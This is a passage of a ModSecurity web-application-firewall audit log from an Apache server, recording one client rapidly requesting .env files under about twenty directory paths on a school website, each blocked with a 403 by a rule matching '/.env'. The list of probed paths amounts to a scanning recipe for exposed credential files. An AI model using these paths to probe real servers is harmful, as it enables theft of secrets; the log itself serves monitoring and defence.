Action: Intercepted (phase 1)
Stopwatch: 1745151837882191 777 (- - -)
Stopwatch2: 1745151837882191 777; combined=365, p1=329, p2=0, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bd910574-Z--
--3409616e-A--
[20/Apr/2025:19:25:00 +0700] aATnnEAzeWrUIk0gvAsrzAAAAM4 103.236.140.4 38276 103.236.140.4 8181
--3409616e-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--3409616e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3409616e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151900073685 842 (- - -)
Stopwatch2: 1745151900073685 842; combined=301, p1=262, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3409616e-Z--
--74f78c65-A--
[20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsrzwAAAM0 103.236.140.4 38284 103.236.140.4 8181
--74f78c65-B--
GET /vendor/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--74f78c65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--74f78c65-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901081858 796 (- - -)
Stopwatch2: 1745151901081858 796; combined=292, p1=262, p2=0, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--74f78c65-Z--
--fcef2361-A--
[20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0AAAAMk 103.236.140.4 38286 103.236.140.4 8181
--fcef2361-B--
GET /lib/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--fcef2361-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fcef2361-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901152806 770 (- - -)
Stopwatch2: 1745151901152806 770; combined=261, p1=216, p2=0, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fcef2361-Z--
--d704e45b-A--
[20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0QAAAME 103.236.140.4 38288 103.236.140.4 8181
--d704e45b-B--
GET /lab/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d704e45b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d704e45b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901222956 925 (- - -)
Stopwatch2: 1745151901222956 925; combined=377, p1=338, p2=0, p3=0, p4=0, p5=39, sr=125, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d704e45b-Z--
--da3e2d6f-A--
[20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RAAAAJM 103.236.140.4 38290 103.236.140.4 8181
--da3e2d6f-B--
GET /cronlab/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--da3e2d6f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--da3e2d6f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901293862 728 (- - -)
Stopwatch2: 1745151901293862 728; combined=254, p1=216, p2=0, p3=0, p4=0, p5=38, sr=61, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--da3e2d6f-Z--
--029c9c00-A--
[20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0gAAAMQ 103.236.140.4 38292 103.236.140.4 8181
--029c9c00-B--
GET /cron/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--029c9c00-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--029c9c00-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901364031 724 (- - -)
Stopwatch2: 1745151901364031 724; combined=285, p1=251, p2=0, p3=0, p4=0, p5=34, sr=105, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--029c9c00-Z--
--196d5474-A--
[20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnAAAAAI 103.236.140.4 38294 103.236.140.4 8181
--196d5474-B--
GET /core/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--196d5474-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--196d5474-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901437375 656 (- - -)
Stopwatch2: 1745151901437375 656; combined=221, p1=191, p2=0, p3=0, p4=0, p5=30, sr=50, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--196d5474-Z--
--cc92217c-A--
[20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0wAAAMw 103.236.140.4 38296 103.236.140.4 8181
--cc92217c-B--
GET /core/app/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--cc92217c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cc92217c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901520250 993 (- - -)
Stopwatch2: 1745151901520250 993; combined=393, p1=350, p2=0, p3=0, p4=0, p5=43, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cc92217c-Z--
--29f35d27-A--
[20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnQAAABA 103.236.140.4 38298 103.236.140.4 8181
--29f35d27-B--
GET /core/Database/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--29f35d27-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--29f35d27-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901595528 622 (- - -)
Stopwatch2: 1745151901595528 622; combined=249, p1=217, p2=0, p3=0, p4=0, p5=31, sr=88, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--29f35d27-Z--
--cddd632b-A--
[20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NngAAABI 103.236.140.4 38300 103.236.140.4 8181
--cddd632b-B--
GET /database/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--cddd632b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cddd632b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901666519 572 (- - -)
Stopwatch2: 1745151901666519 572; combined=204, p1=172, p2=0, p3=0, p4=0, p5=32, sr=47, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cddd632b-Z--
--b8edba07-A--
[20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RQAAAJU 103.236.140.4 38302 103.236.140.4 8181
--b8edba07-B--
GET /system/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--b8edba07-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b8edba07-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901738928 616 (- - -)
Stopwatch2: 1745151901738928 616; combined=245, p1=173, p2=0, p3=0, p4=0, p5=72, sr=47, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b8edba07-Z--
--eaf8ec20-A--
[20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnwAAAA4 103.236.140.4 38304 103.236.140.4 8181
--eaf8ec20-B--
GET /config/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--eaf8ec20-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eaf8ec20-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901814134 895 (- - -)
Stopwatch2: 1745151901814134 895; combined=345, p1=298, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eaf8ec20-Z--
--6324b83b-A--
[20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RgAAAIo 103.236.140.4 38306 103.236.140.4 8181
--6324b83b-B--
GET /assets/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--6324b83b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6324b83b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901885784 853 (- - -)
Stopwatch2: 1745151901885784 853; combined=306, p1=258, p2=0, p3=0, p4=0, p5=48, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6324b83b-Z--
--a4f3a579-A--
[20/Apr/2025:19:25:01 +0700] aATnnVTf0pL9EQC7JDUZ1QAAAE0 103.236.140.4 38308 103.236.140.4 8181
--a4f3a579-B--
GET /fileweb/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--a4f3a579-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a4f3a579-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151901956957 880 (- - -)
Stopwatch2: 1745151901956957 880; combined=373, p1=337, p2=0, p3=0, p4=0, p5=35, sr=135, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a4f3a579-Z--
--801b007f-A--
[20/Apr/2025:19:25:02 +0700] aATnnsTCDeBrh52UaHS-RwAAAIE 103.236.140.4 38310 103.236.140.4 8181
--801b007f-B--
GET /l53/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--801b007f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--801b007f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902030806 676 (- - -)
Stopwatch2: 1745151902030806 676; combined=221, p1=190, p2=0, p3=0, p4=0, p5=31, sr=49, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--801b007f-Z--
--1e5a584f-A--
[20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NoAAAAAc 103.236.140.4 38312 103.236.140.4 8181
--1e5a584f-B--
GET /club/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--1e5a584f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1e5a584f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902101123 887 (- - -)
Stopwatch2: 1745151902101123 887; combined=346, p1=295, p2=0, p3=0, p4=0, p5=51, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1e5a584f-Z--
--04575f50-A--
[20/Apr/2025:19:25:02 +0700] aATnnlTf0pL9EQC7JDUZ1gAAAEc 103.236.140.4 38314 103.236.140.4 8181
--04575f50-B--
GET /app/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--04575f50-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--04575f50-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902171619 765 (- - -)
Stopwatch2: 1745151902171619 765; combined=303, p1=256, p2=0, p3=0, p4=0, p5=47, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--04575f50-Z--
--80ac107c-A--
[20/Apr/2025:19:25:02 +0700] aATnnsTCDeBrh52UaHS-SAAAAJg 103.236.140.4 38316 103.236.140.4 8181
--80ac107c-B--
GET /apps/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--80ac107c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--80ac107c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902257378 955 (- - -)
Stopwatch2: 1745151902257378 955; combined=397, p1=326, p2=0, p3=0, p4=0, p5=70, sr=131, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--80ac107c-Z--
--09cc063f-A--
[20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1AAAAMs 103.236.140.4 38318 103.236.140.4 8181
--09cc063f-B--
GET /uploads/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--09cc063f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--09cc063f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902343852 850 (- - -)
